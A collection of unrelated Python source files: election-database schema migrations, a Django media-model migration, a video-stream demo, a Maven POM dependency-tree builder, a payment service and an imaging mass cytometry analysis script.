' FOREIGN KEY (list_id) REFERENCES lists (id)'
' ON DELETE CASCADE'
)
# this one does not fit the schema
context.operations.execute(
'ALTER TABLE lists '
'DROP CONSTRAINT IF EXISTS lists_connection_id_fkey,'
' ADD CONSTRAINT lists_connection_id_fkey'
' FOREIGN KEY (connection_id) REFERENCES list_connections (id)'
' ON DELETE CASCADE'
)
@upgrade_task('Adds migration for related link and related link label')
def add_related_link_and_label(context):
# Removed data migrations
pass
@upgrade_task('Adds Doppelter Pukelsheim to CompoundElection/Election')
def add_after_pukelsheim(context):
for table in ('election_compounds', 'elections'):
if not context.has_column(table, 'after_pukelsheim'):
context.add_column_with_defaults(
table, Column(
'after_pukelsheim',
Boolean,
nullable=False,
default=False
), default=lambda x: False)
if not context.has_column('election_compounds', 'pukelsheim_completed'):
context.add_column_with_defaults(
'election_compounds', Column(
'pukelsheim_completed',
Boolean,
nullable=False,
default=False
), default=lambda x: False)
@upgrade_task(
'Add district and none domains of influence',
requires='onegov.ballot:Add region domain of influence',
)
def add_district_and_none_domain(context):
alter_domain_of_influence(
context,
['federation', 'region', 'canton', 'municipality'],
['federation', 'canton', 'region', 'district', 'municipality', 'none']
)
@upgrade_task('Adds last result change columns')
def add_last_result_change(context):
for table in ('elections', 'election_compounds', 'votes'):
if not context.has_column(table, 'last_result_change'):
context.operations.add_column(
table, Column('last_result_change', UTCDateTime)
)
@upgrade_task('Adds voters count to party results')
def add_voters_count(context):
if not context.has_column('party_results', 'voters_count'):
context.operations.add_column(
'party_results', Column('voters_count', Integer)
)
@upgrade_task(
'Cleans up pukelsheim fields',
requires=(
'onegov.ballot:Adds Doppelter Pukelsheim to CompoundElection/Election'
)
)
def cleanup_pukelsheim_fields(context):
if context.has_column('elections', 'after_pukelsheim'):
context.operations.drop_column(
'elections',
'after_pukelsheim'
)
if context.has_column('election_compounds', 'after_pukelsheim'):
context.operations.alter_column(
'election_compounds',
'after_pukelsheim',
new_column_name='pukelsheim'
)
@upgrade_task(
'Add manual completion fields',
requires=(
'onegov.ballot:Cleans up pukelsheim fields'
)
)
def add_manual_completion_fields(context):
if not context.has_column('election_compounds', 'completes_manually'):
context.add_column_with_defaults(
'election_compounds',
Column(
'completes_manually',
Boolean,
nullable=False,
default=False
),
default=lambda x: False
)
if context.has_column('election_compounds', 'pukelsheim_completed'):
context.operations.alter_column(
'election_compounds',
'pukelsheim_completed',
new_column_name='manually_completed'
)
@upgrade_task(
'Change voters count to numeric',
requires=(
'onegov.ballot:Adds voters count to party results'
)
)
def change_voters_count_to_numeric(context):
if context.has_column('party_results', 'voters_count'):
context.operations.alter_column(
'party_results',
'voters_count',
type_=Numeric(12, 2)
)
@upgrade_task('Adds superregion to election results')
def add_superregion_to_election_results(context):
if not context.has_column('election_results', 'superregion'):
context.operations.add_column(
'election_results', Column('superregion', Text, nullable=True)
)
@upgrade_task('Adds total voters count to party results')
def add_total_voters_count(context):
if not context.has_column('party_results', 'total_voters_count'):
context.operations.add_column(
'party_results', Column('total_voters_count', Numeric(12, 2))
)
@upgrade_task(
'Change total voters count to percentage',
requires='onegov.ballot:Adds total voters count to party results',
)
def change_total_voters_count(context):
if (
context.has_column('party_results', 'total_voters_count')
and not context.has_column('party_results', 'voters_count_percentage')
):
context.operations.alter_column(
'party_results', 'total_voters_count',
new_column_name='voters_count_percentage'
)
@upgrade_task('Add party id column')
def add_party_id_column(context):
if not context.has_column('party_results', 'party_id'):
context.operations.add_column(
'party_results',
Column('party_id', Text())
)
@upgrade_task('Add party name translations')
def add_party_name_translations(context):
if context.has_column('party_results', 'name'):
context.operations.alter_column(
'party_results', 'name',
nullable=True
)
if not context.has_column('party_results', 'name_translations'):
context.add_column_with_defaults(
table='party_results',
column=Column('name_translations', HSTORE, nullable=False),
default=lambda x: {}
)
if (
context.has_column('party_results', 'name_translations')
and context.has_column('party_results', 'name')
):
context.operations.execute("""
UPDATE party_results SET name_translations = hstore('de_CH', name);
""")
@upgrade_task(
'Remove obsolete party names',
requires='onegov.ballot:Add party name translations',
)
def remove_obsolete_party_names(context):
if context.has_column('party_results', 'name'):
context.operations.drop_column('party_results', 'name')
if context.has_column('party_results', 'party_id'):
context.operations.execute("""
DELETE FROM party_results WHERE party_id is NULL;
""")
context.operations.alter_column(
'party_results', 'party_id', nullable=False
)
@upgrade_task('Add gender column')
def add_gender_column(context):
if not context.has_column('candidates', 'gender'):
context.operations.add_column(
'candidates',
Column(
'gender',
Enum('male', 'female', 'undetermined',
name='candidate_gender'),
nullable=True
)
)
@upgrade_task('Add year of birth column')
def add_year_of_birth_column(context):
if not context.has_column('candidates', 'year_of_birth'):
context.operations.add_column(
'candidates',
Column('year_of_birth', Integer(), nullable=True)
)
@upgrade_task('Add exapts columns')
def add_exapts_columns(context):
for table in ('election_results', 'ballot_results'):
if not context.has_column(table, 'expats'):
context.operations.add_column(
table,
Column('expats', Integer(), nullable=True)
)
@upgrade_task('Add domain columns to party results')
def add_domain_columns_to_party_results(context):
for column in ('domain', 'domain_segment'):
if not context.has_column('party_results', column):
context.operations.add_column(
'party_results',
Column(column, Text(), nullable=True)
)
@upgrade_task(
'Drop party color column',
requires='onegov.ballot:Add party resuts columns',
)
def drop_party_color_column(context):
if context.has_column('party_results', 'color'):
context.operations.drop_column('party_results', 'color')
@upgrade_task(
'Add foreign keys to party results',
requires='onegov.ballot:Add party results to compounds'
)
def add_foreign_keys_to_party_results(context):
if context.has_column('party_results', 'owner'):
context.operations.alter_column(
'party_results', 'owner', nullable=True
)
if not context.has_column('party_results', 'election_id'):
context.operations.add_column(
'party_results',
Column(
'election_id',
Text,
ForeignKey(
'elections.id',
onupdate='CASCADE',
ondelete='CASCADE'
),
nullable=True
)
)
if not context.has_column('party_results', 'election_compound_id'):
context.operations.add_column(
'party_results',
Column(
'election_compound_id',
Text,
ForeignKey(
'election_compounds.id',
onupdate='CASCADE',
ondelete='CASCADE'
),
nullable=True
)
)
@upgrade_task(
'Add foreign keys to panachage results',
requires='onegov.ballot:Add panachage results to compounds'
)
def add_foreign_keys_to_panahcage_results(context):
if not context.has_column('panachage_results', 'election_id'):
context.operations.add_column(
'panachage_results',
Column(
'election_id',
Text,
ForeignKey(
'elections.id',
onupdate='CASCADE',
ondelete='CASCADE'
),
nullable=True
)
)
if not context.has_column('panachage_results', 'election_compound_id'):
context.operations.add_column(
'panachage_results',
Column(
'election_compound_id',
Text,
ForeignKey(
'election_compounds.id',
onupdate='CASCADE',
ondelete='CASCADE'
),
nullable=True
)
)
@upgrade_task(
'Drop owner from party results',
requires='onegov.ballot:Add foreign keys to party results'
)
def drop_owner_from_party_results(context):
if context.has_column('party_results', 'owner'):
context.operations.drop_column(
'party_results', 'owner'
)
@upgrade_task(
'Drop owner from panachage results',
requires='onegov.ballot:Add foreign keys to panachage results'
)
def drop_owner_from_panachage_results(context):
if context.has_column('panachage_results', 'owner'):
context.operations.drop_column(
'panachage_results', 'owner'
)
@upgrade_task('Add type to election relationships')
def add_type_election_relationships(context):
if context.has_table('election_associations'):
if context.has_table('election_relationships'):
context.operations.drop_table('election_relationships')
context.operations.rename_table(
'election_associations', 'election_relationships'
)
if context.has_table('election_relationships'):
if not context.has_column('election_relationships', 'type'):
context.operations.add_column(
'election_relationships',
Column('type', Text(), nullable=True)
)
@upgrade_task('Remove old panachage results')
def remove_old_panachage_results(context):
if context.has_table('panachage_results'):
context.operations.drop_table('panachage_results')
@upgrade_task('Fix file constraints')
def fix_file_constraints(context):
for table, ref in (
('files_for_elections_files', 'elections'),
('files_for_election_compounds_files', 'election_compounds'),
('files_for_votes_files', 'votes'),
):
context.operations.execute(
f'ALTER TABLE {table} '
f'DROP CONSTRAINT {table}_{ref}_id_fkey, '
f'ADD CONSTRAINT {table}_{ref}_id_fkey'
f' FOREIGN KEY ({ref}_id) REFERENCES {ref} (id) ON UPDATE CASCADE'
)
@upgrade_task('Add external ids')
def add_external_ids(context):
for table in ('elections', 'election_compounds', 'votes'):
if not context.has_column(table, 'external_id'):
context.operations.add_column(
table,
Column('external_id', Text(), nullable=True)
)
@upgrade_task('Add external ballot ids')
def add_external_ballot_ids(context):
if not context.has_column('ballots', 'external_id'):
context.operations.add_column(
'ballots',
Column('external_id', Text(), nullable=True)
)
|
# Generated by Django 3.1.5 on 2021-03-26 13:19
from django.db import migrations, models
import django_mysql.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AudioBook',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('author', models.CharField(max_length=100)),
('narrator', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('uploadedTime', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Podcast',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('podcastName', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('uploadedTime', models.DateTimeField(auto_now=True)),
('hostName', models.CharField(max_length=100)),
('participants', django_mysql.models.ListCharField(models.CharField(max_length=100), default='', max_length=1010, size=10)),
],
),
migrations.CreateModel(
name='Song',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('songName', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('uploadedTime', models.DateTimeField(auto_now=True)),
],
),
]
|
tab_cat = "\tI'm tabbed."
pers_cat = "I'm split\non a line"
back_cat = "I'm \\ a \\ cat"
fat_cat = """
I'll do a list:
\t*food
\t* fish
\t* nip\n\t*Grass
"""
print(tab_cat)
print(pers_cat)
print(back_cat)
print(fat_cat)
print("Lyla is a beautiful coder.") |
# -*- coding: utf-8 -*-
# flake8: noqa
"""Automatic and manual clustering facilities."""
from .algorithms import cluster
from .session import Session
from .view_models import (BaseClusterViewModel,
HTMLClusterViewModel,
StatsViewModel,
)
|
import itertools
import os
import cv2
from video_util.frame_drawer import FrameDrawer
get_your_config_from_env_var = os.environ.get('CONFIG_NAME', 'default_value_if_not_set')
# comma separated strings
video_feed_names = os.environ.get('VIDEO_FEED_NAMES',
'FILE1,RTSP2')
streams = os.environ.get('STREAMS',
'/data/datasets/drone/macritchie-reservoir.mp4,rtsp://wowzaec2demo.streamlock.net/vod/mp4:BigBuckBunny_115k.mov')
manual_video_fps = os.environ.get('MANUAL_VIDEO_FPS', '-1,-1') # -1 to try to read from video stream metadata
source_types = os.environ.get('SOURCE_TYPES', 'file,rtsp')
queue_size = int(os.environ.get('QUEUE_SIZE', 2))
recording_dir = os.environ.get('RECORDING_DIR', None)
reconnect_threshold_sec = int(os.environ.get('RECONNECT_THRESHOLD_SEC', 5))
max_height = int(os.environ.get('MAX_HEIGHT', 1080))
method = os.environ.get('METHOD', 'cv2')
'''
Sample code on usage for concurrent streams
Run from one level above video_utils (video_utils should be treated as a module, this file just acts as a crash course/demo: `python3 -m video_utils .`
'''
def one_video_manager_to_many_source():
frame_drawer = FrameDrawer()
from .video_manager import VideoManager
vidManager = VideoManager(video_feed_names=video_feed_names.split(','),
streams=streams.split(','), source_types=source_types.split(','),
manual_video_fps=manual_video_fps.split(','), queue_size=queue_size,
recording_dir=recording_dir,
reconnect_threshold_sec=reconnect_threshold_sec, max_height=max_height, method=method)
vidManager.start()
print(f'{vidManager.get_all_videos_information()}')
for frame_count in itertools.count():
frame_of_each_video_feed = vidManager.read() # frames is list of arrays from 0 - 255, dtype uint8
for i, video_stream_information in enumerate(vidManager.videos):
if len(frame_of_each_video_feed[i]) != 0:
drawn_frame = frame_drawer.draw_detections(frame_of_each_video_feed[i],
[('test0', 0, (80, 80, 100, 60)),
('test1', 0, (100, 100, 120, 80))])
cv2.imshow(video_stream_information['video_feed_name'], drawn_frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
vidManager.stop()
def one_video_manager_to_one_source():
frame_drawer = FrameDrawer()
from .video_manager_single_feed_multiple_sources import VideoManager
vidManager = VideoManager(source_type='rtsp',
stream='rtsp://wowzaec2demo.streamlock.net/vod/mp4:BigBuckBunny_115k.mov',
manual_video_fps=-1,
rectangle_crops=[(0, 0, 60, 160), (80, 0, 60, 160), (160, 0, 60, 160)],
queue_size=queue_size,
recording_dir=recording_dir,
reconnect_threshold_sec=reconnect_threshold_sec, max_height=max_height, method=method)
vidManager.start()
print(f'{vidManager.get_all_videos_information()}')
for frame_count in itertools.count():
frame_of_each_video_feed = vidManager.read() # frames is list of arrays from 0 - 255, dtype uint8
for i in range(vidManager.num_vid_streams):
if len(frame_of_each_video_feed[i]) != 0:
drawn_frame = frame_drawer.draw_detections(frame_of_each_video_feed[i],
[('test0', 0, (80, 80, 100, 60)),
('test1', 0, (100, 100, 120, 80))])
cv2.imshow(str(i), drawn_frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
vidManager.stop()
if __name__ == '__main__':
one_video_manager_to_many_source()
# one_video_manager_to_one_source()
|
from pypomvisualiser.pom.PomTreeNode import PomTreeNode
from pypomvisualiser.exceptions.PyPomExceptions import PomParseError
from enum import Enum
import logging
class NodeEnum(Enum):
EXTDEP = "#C0C0C0"
USERPOM = "#99CCFF"
ROOTPOM = "#0099FF"
class TreeCreation(object):
def __init__(self, listOfPoms):
''' '''
self.rootNode = None
self.nodeList = []
self.resolveTreeStructure(listOfPoms)
def resolveTreeStructure(self, listOfPoms):
for pom in listOfPoms:
print(pom.getFileLocation())
pomArt = pom.getArtifactId()
pomGrp = pom.getGroupId()
''' If node is in found list then use that, if not make a new one'''
tmpnode = self.getNodeWith(pomArt, pomGrp)
if tmpnode == None:
tmpnode = PomTreeNode(pomArt, pomGrp, NodeEnum.USERPOM, pom)
self.nodeList.append(tmpnode)
if tmpnode.getData() == None:
tmpnode.setData(pom)
''' ####################'''
'''determines if pom has parent, if it does, determine if in nodeList and add as parentNode'''
if pom.getParentPom():
parPom = pom.getParentPom()
if (pomArt == parPom.getArtifactId) and (pomGrp == parPom.getGroupId):
pass
else:
par = self.inNodeList(self.nodeList, PomTreeNode(parPom.getArtifactId(), parPom.getGroupId(), NodeEnum.USERPOM, None))
tmpnode.setParentNode(par)
par.addChildNodes(tmpnode)
''' determine if any nodes match the dependencies and then add dep nodes accordingly'''
for dep in pom.getDependencies():
notfound = True
for inner in listOfPoms:
if (inner.getGroupId() == dep.getGroupId()) and (inner.getArtifactId() == dep.getArtifactId()):
''' inner is dependency, make node which refers to this.'''
foundNode = self.inNodeList(self.nodeList, PomTreeNode(inner.getArtifactId(), inner.getGroupId(), NodeEnum.USERPOM, None))
tmpnode.addDependencyNode(foundNode)
foundNode.addReverseDependencyNode(tmpnode)
notfound = False
break
# Add reverse dependency assignment
if notfound is True:
depNode = self.inNodeList(self.nodeList, PomTreeNode(dep.getArtifactId(), dep.getGroupId(), NodeEnum.EXTDEP, dep))
tmpnode.addDependencyNode(depNode)
depNode.addReverseDependencyNode(tmpnode)
''' ################### '''
self.resolveRootNode()
def getNodeWith(self, artId, grpId):
for temporaryNode in self.nodeList:
if (temporaryNode.getGroupId() == grpId) and (temporaryNode.getArtifactId() == artId):
return temporaryNode
def inNodeList(self, nodeList, nodeToFind):
assert type(nodeToFind) is PomTreeNode
for node in nodeList:
if (node.getGroupId() == nodeToFind.getGroupId()) and (node.getArtifactId() == nodeToFind.getArtifactId()):
self.nodeList.append(node)
return node
self.nodeList.append(nodeToFind)
return nodeToFind
def resolveRootNode(self):
length = len(self.nodeList)
if length > 0:
activeNode = None
for node in self.nodeList:
assert type(node) is PomTreeNode
if activeNode != None:
act = self.resolveNodeRelations(node)
if act != activeNode:
logging.error("Multiple root nodes encountered")
raise PomParseError("Resolution of RootNode failed as the structure contains multiple trees")
else:
activeNode = self.resolveNodeRelations(node)
else:
raise PomParseError("Resolution of RootNode failed as the structure is empty")
def resolveNodeRelations(self, potentialRootNode):
parent = potentialRootNode.getParent()
if parent != None and parent != potentialRootNode:
print(parent.getArtifactId())
self.resolveNodeRelations(parent)
elif potentialRootNode.getReverseDependencyNodes():
print("rev dep nodes")
''' Needs to follow these, maybe one, maybe all'''
else:
self.rootNode = potentialRootNode
logging.info("Root node chosen: " + potentialRootNode.getArtifactId() + " " + potentialRootNode.getGroupId())
self.rootNode.setType(NodeEnum.ROOTPOM)
''' Could be root node'''
def getRootNode(self):
return self.rootNode |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service to manage Internal Payments.
There are conditions where the payment will be handled internally. For e.g, zero $ or staff payments.
"""
from datetime import datetime
from typing import Any, Dict
from flask import current_app
from pay_api.services.base_payment_system import PaymentSystemService
from pay_api.services.invoice import Invoice
from pay_api.services.invoice_reference import InvoiceReference
from pay_api.services.payment_account import PaymentAccount
from pay_api.utils.enums import PaymentSystem, PaymentMethod, InvoiceStatus, PaymentStatus
from pay_api.utils.util import generate_transaction_number
from .oauth_service import OAuthService
from .payment_line_item import PaymentLineItem
class InternalPayService(PaymentSystemService, OAuthService):
"""Service to manage internal payment."""
def get_payment_system_code(self):
"""Return INTERNAL as the system code."""
return PaymentSystem.INTERNAL.value
def create_account(self, name: str, contact_info: Dict[str, Any], payment_info: Dict[str, Any],
**kwargs) -> any:
"""No Account needed for internal pay."""
def update_account(self, name: str, cfs_account: any, payment_info: Dict[str, Any]) -> any:
"""No Account needed for direct pay."""
def create_invoice(self, payment_account: PaymentAccount, line_items: [PaymentLineItem], invoice: Invoice,
**kwargs) -> InvoiceReference:
"""Return a static invoice number."""
current_app.logger.debug('<create_invoice')
invoice_reference: InvoiceReference = InvoiceReference.create(invoice.id,
generate_transaction_number(invoice.id), None)
current_app.logger.debug('>create_invoice')
return invoice_reference
def update_invoice(self, payment_account: PaymentAccount, # pylint:disable=too-many-arguments
line_items: [PaymentLineItem], invoice_id: int, paybc_inv_number: str, reference_count: int = 0,
**kwargs):
"""Do nothing as internal payments cannot be updated as it will be completed on creation."""
def cancel_invoice(self, payment_account: PaymentAccount, inv_number: str):
"""Adjust the invoice to zero."""
def get_receipt(self, payment_account: PaymentAccount, pay_response_url: str, invoice_reference: InvoiceReference):
"""Create a static receipt."""
# Find the invoice using the invoice_number
invoice = Invoice.find_by_id(invoice_reference.invoice_id, skip_auth_check=True)
return f'{invoice_reference.invoice_number}', datetime.now(), invoice.total
def get_payment_method_code(self):
"""Return CC as the method code."""
return PaymentMethod.INTERNAL.value
def get_default_invoice_status(self) -> str:
"""Return CREATED as the default invoice status."""
return InvoiceStatus.CREATED.value
def get_default_payment_status(self) -> str:
"""Return the default status for payment when created."""
return PaymentStatus.CREATED.value
def complete_post_invoice(self, invoice: Invoice, invoice_reference: InvoiceReference) -> None:
"""Complete any post invoice activities if needed."""
# pylint: disable=import-outside-toplevel, cyclic-import
from .payment_transaction import PaymentTransaction
from .payment import Payment
# Create a payment record
Payment.create(payment_method=self.get_payment_method_code(),
payment_system=self.get_payment_system_code(),
payment_status=self.get_default_payment_status(),
invoice_number=invoice_reference.invoice_number,
invoice_amount=invoice.total,
payment_account_id=invoice.payment_account_id)
transaction: PaymentTransaction = PaymentTransaction.create_transaction_for_invoice(
invoice.id,
{
'clientSystemUrl': '',
'payReturnUrl': ''
}
)
transaction.update_transaction(transaction.id, pay_response_url=None)
|
#! /usr/bin/env python
"""
Analysis of revision data with more depth in the immune compartment.
"""
import sys
import datetime
from argparse import ArgumentParser, Namespace
import json
from dataclasses import dataclass
from tqdm import tqdm
from joblib import parallel_backend # type: ignore[import]
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
from anndata import AnnData
import scanpy as sc
from imc import Project
from imc.types import Path, DataFrame, Array
from imc.graphics import close_plots, rasterize_scanpy, add_centroids
from imc.utils import z_score
from seaborn_extensions import clustermap, swarmboxenplot
args: Namespace
def main() -> int:
global args
# Parse arguments
args = get_parser().parse_args()
args.resolutions = [float(x) for x in args.resolutions]
prj = get_project()
illustrations(prj)
phenotyping(prj)
replot_with_classic_cell_types(prj)
metacluster_expression(prj)
intra_metacluster(prj)
example_visualizations(prj)
return 0
def get_parser() -> ArgumentParser:
parser = ArgumentParser()
parser.add_argument("--overwrite", action="store_true")
parser.add_argument(
"--resolutions", default=[0.5, 1.0, 1.5, 2.0, 3.0], nargs="+"
)
parser.add_argument("--algos", default=["umap"], nargs="+")
return parser
def get_project() -> Project:
prj = Project(name="imc_revision")
prj.samples = [s for s in prj if "2021" in s.name]
for r in prj.rois:
r.set_channel_exclude(consts.exclude_channels)
return prj
# for s in prj:
# s.rois = [r for r in s if r._get_input_filename("cell_mask").exists()]
@close_plots
def illustrations(prj: Project) -> None:
from csbdeep.utils import normalize # type: ignore[import]
(consts.output_dir / "full_stacks").mkdir()
(consts.output_dir / "illustration").mkdir()
for r in tqdm(prj.rois):
output_f = consts.output_dir / "full_stacks" / r.name + ".pdf"
if output_f.exists():
continue
fig = r.plot_channels()
fig.savefig(output_f, **consts.figkws)
for r in tqdm(prj.rois):
output_f = consts.output_dir / "illustration" / r.name + ".svg"
if output_f.exists():
continue
fig = r.plot_probabilities_and_segmentation()
fig.savefig(output_f, **consts.figkws)
# Specific example
roi_name = "A20_58_20210122_ActivationPanel-01"
x, y = (600, 200), (950, 450)
r = prj.get_rois(roi_name)
q = r._get_channels(
["CD31", "CD39", "DNA1"], minmax=True, log=True, smooth=1
)[1]
q2 = np.moveaxis(q, 0, -1)
fig, ax = plt.subplots(1, 1, figsize=(4, 4))
ax.imshow(normalize(q2))
ax.set(title=roi_name, xlim=x, ylim=y)
fig.savefig(
"Red:CD31-Green:CD39-Blue:DNA.A20_58_example.png", **consts.figkws
)
def qc(prj: Project) -> None:
(consts.output_dir / "qc").mkdir()
output_prefix = consts.output_dir / "qc" / "channel_summary."
c = prj.rois[0].channel_labels
exc = [x for x in c if x in consts.exclude_channels]
prj.channel_summary(output_prefix=output_prefix, channel_exclude=exc)
@close_plots
def phenotyping(prj: Project) -> None:
(consts.output_dir / "phenotyping").mkdir()
# output_prefix = consts.output_dir / "phenotyping" / prj.name + f".{cur_date}."
output_prefix = consts.output_dir / "phenotyping" / prj.name + "."
quant_f = output_prefix + "quantification.pq"
if not quant_f.exists() or args.overwrite:
prj.quantify_cells()
quant = prj.quantification
prj.quantification.to_parquet(quant_f)
quant = pd.read_parquet(quant_f)
quant_mean = quant.groupby("sample").mean()
quant = quant.drop(consts.exclude_channels, axis=1)
# Collapse redudant channels
quant["DNA"] = quant.loc[:, quant.columns.str.contains("DNA")].mean(1)
quant["Ki67"] = quant["Ki67(Pt196)"]
quant = quant.drop(
quant.columns[
quant.columns.str.contains(r"DNA\d\(")
| quant.columns.str.contains(r"Ki67\(")
],
axis=1,
)
# filter out cells
quant_ff = quant_f.replace_(".pq", ".filtered.pq")
if not quant_ff.exists() or args.overwrite:
exclude = filter_out_cells(
quant, plot=True, output_prefix=output_prefix
)
tqdm.write(
f"Filtering out {exclude.sum()} cells ({(exclude.sum() / exclude.shape[0]) * 100:.2f} %)"
)
quant = quant.loc[~exclude, :]
quant.to_parquet(quant_ff)
quant = pd.read_parquet(quant_ff)
# Process, project, cluster
h5ad_f = output_prefix + "sample_zscore.h5ad"
if not h5ad_f.exists() or args.overwrite:
# Drop unwanted channels and redundant morphological features
q = quant.drop(["perimeter", "major_axis_length"], axis=1).reset_index()
id_cols = ["sample", "roi", "obj_id"]
# get measure of overal intensity
tech = q.merge(
quant_mean[consts.exclude_channels[:-2]]
.apply(z_score)
.mean(1)
.rename("tech"),
left_on="sample",
right_index=True,
)["tech"]
# # Z-score by sample:
from src.utils import z_score_by_column
zquant = z_score_by_column(
quant, "sample", clip=(-2.5, 10)
).reset_index()
a = AnnData(
zquant.drop(id_cols + ["area"], axis=1),
obs=zquant[id_cols + ["area"]].join(tech),
)
# # keep track of raw untransformed values
q = quant[a.var.index].reset_index()
q = q.reindex(a.obs.index.astype(int)).set_index("obj_id")
r = AnnData(q.reset_index(drop=True))
a.raw = r
sc.pp.scale(a)
# Proceed with dimres + clustering
sc.pp.pca(a)
with parallel_backend("threading", n_jobs=12):
sc.pp.neighbors(a, n_neighbors=15, use_rep="X_pca")
with parallel_backend("threading", n_jobs=12):
sc.tl.umap(a, gamma=25)
for res in tqdm(args.resolutions, desc="resolution"):
sc.tl.leiden(a, resolution=res, key_added=f"cluster_{res}")
a.obs[f"cluster_{res}"] = pd.Categorical(
a.obs[f"cluster_{res}"].astype(int) + 1
)
sc.write(h5ad_f, a)
a = sc.read(h5ad_f)
a = a[a.obs.sample(frac=1).index, :]
# output_prefix = output_prefix.replace_(cur_date, f"{cur_date}.raw.")
output_prefix += "sample_zscore."
# Plot cluster phenotypes
for res in args.resolutions:
# # get mean per cluster
m = a.to_df().groupby(a.obs[f"cluster_{res}"]).mean()
umap_pos = (
pd.DataFrame(
a.obsm["X_umap"], index=a.obs.index, columns=["UMAP1", "UMAP2"]
)
.groupby(a.obs[f"cluster_{res}"])
.mean()
)
m = m.join(umap_pos)
# mr = (
# AnnData(a.raw.X, var=a.var, obs=a.obs)
# .to_df()
# .groupby(a.obs[f"cluster_{res}"])
# .mean()
# )
# mr = mr.join(umap_pos)
# # get normalized proportions per disease group
annot = a.obs.merge(consts.phenotypes.to_frame().reset_index())
ct = annot["phenotypes"].value_counts()
ct /= ct.sum()
c = annot.groupby([f"cluster_{res}", "phenotypes"]).size()
p = c.groupby(level=0).apply(lambda x: x / x.sum())
p = p.to_frame().pivot_table(
index=f"cluster_{res}", columns="phenotypes", values=0
)
p = np.log2(p / ct)
for conf in ["abs", "z"]:
# grid = clustermap(
# mr, row_colors=p, config=conf, figsize=(8, 4 * max(1, res))
# )
# grid.fig.savefig(
# output_prefix
# + f"phenotypes.cluster_{res}.clustermap.raw.{conf}.svg",
# **consts.figkws,
# )
grid = clustermap(
m, row_colors=p, config=conf, figsize=(8, 4 * max(1, res))
)
grid.fig.savefig(
output_prefix
+ f"phenotypes.cluster_{res}.clustermap.norm.{conf}.svg",
**consts.figkws,
)
# Plot projections
# vmin = [min(x, 0.0) for x in np.percentile(a.raw.X, 1, axis=0).tolist()]
# vmax = [max(x, 1.0) for x in np.percentile(a.raw.X, 99, axis=0).tolist()]
# vmin = np.percentile(a.raw.X, 1, axis=0).tolist()
vmin = None
vmax = np.percentile(a.raw.X, 99, axis=0).tolist()
# notes:
## if scaling values clip both ends to percentiles
## if using log or raw original values clip top to percentiles
color = (
a.var.index.tolist()
+ ["area", "sample"]
+ [f"cluster_{res}" for res in args.resolutions]
)
for algo in args.algos:
# norm values
f = output_prefix + f"{algo}.z.svgz"
projf = getattr(sc.pl, algo)
axes = projf(
a,
color=color,
show=False,
use_raw=False,
)
fig = axes[0].figure
for ax, res in zip(axes[-len(args.resolutions) :], args.resolutions):
add_centroids(a, res=res, ax=ax)
rasterize_scanpy(fig)
fig.savefig(f, **consts.figkws)
# original values
f = output_prefix + f"{algo}.raw.svgz"
projf = getattr(sc.pl, algo)
axes = projf(
a,
color=color,
show=False,
vmin=vmin,
vmax=vmax
+ [np.percentile(a.obs["area"], 99)]
+ [None]
+ [None] * (len(args.resolutions)),
use_raw=True,
)
fig = axes[0].figure
for ax, res in zip(axes[-len(args.resolutions) :], args.resolutions):
add_centroids(a, res=res, ax=ax)
rasterize_scanpy(fig)
fig.savefig(f, **consts.figkws)
def replot_with_classic_cell_types(prj) -> None:
(consts.output_dir / "phenotyping").mkdir()
output_prefix = consts.output_dir / "phenotyping" / prj.name + "."
res = 2.0
h5ad_f = output_prefix + "sample_zscore.labeled.h5ad"
a = sc.read(h5ad_f)
a = a[a.obs.sample(frac=1).index, :]
# Redo UMAP with only filtered cell types
a2 = a[~a.obs[f"metacluster_labels_{res}"].str.startswith("?"), :]
sc.pp.scale(a2)
sc.pp.pca(a2)
with parallel_backend("threading", n_jobs=12):
sc.pp.neighbors(a2, n_neighbors=15, use_rep="X_pca")
with parallel_backend("threading", n_jobs=12):
sc.tl.umap(a2, gamma=25)
# Replot projections
vmin = None
vmax = np.percentile(a2.raw.X, 99, axis=0).tolist()
color = (
a2.var.index.tolist()
+ ["area", "sample", "disease", "phenotypes"]
+ [f"metacluster_labels_{res}"]
)
for algo in args.algos:
# norm values
f = output_prefix + f"{algo}.filtered.z.svgz"
projf = getattr(sc.pl, algo)
axes = projf(
a2,
color=color,
show=False,
use_raw=False,
)
fig = axes[0].figure
for ax, res in zip(axes[-len(args.resolutions) :], args.resolutions):
add_centroids(a2, res=res, ax=ax)
rasterize_scanpy(fig)
fig.savefig(f, **consts.figkws)
# original values
f = output_prefix + f"{algo}.filtered.raw.svgz"
projf = getattr(sc.pl, algo)
axes = projf(
a2,
color=color,
show=False,
vmin=vmin,
vmax=vmax
+ [np.percentile(a2.obs["area"], 99)]
+ [None, None, None, None],
use_raw=True,
)
fig = axes[0].figure
for ax, res in zip(axes[-len(args.resolutions) :], args.resolutions):
add_centroids(a2, res=res, ax=ax)
rasterize_scanpy(fig)
fig.savefig(f, **consts.figkws)
# output_prefix = output_prefix.replace_(cur_date, f"{cur_date}.raw.")
output_prefix += "sample_zscore."
# Plot cluster phenotypes
res = 2.0
# # get mean per cluster
m = a2.to_df().groupby(a2.obs[f"metacluster_labels_{res}"]).mean()
# # get normalized proportions per disease group
annot = a2.obs.merge(consts.phenotypes.to_frame().reset_index())
ct = annot["phenotypes"].value_counts()
ct /= ct.sum()
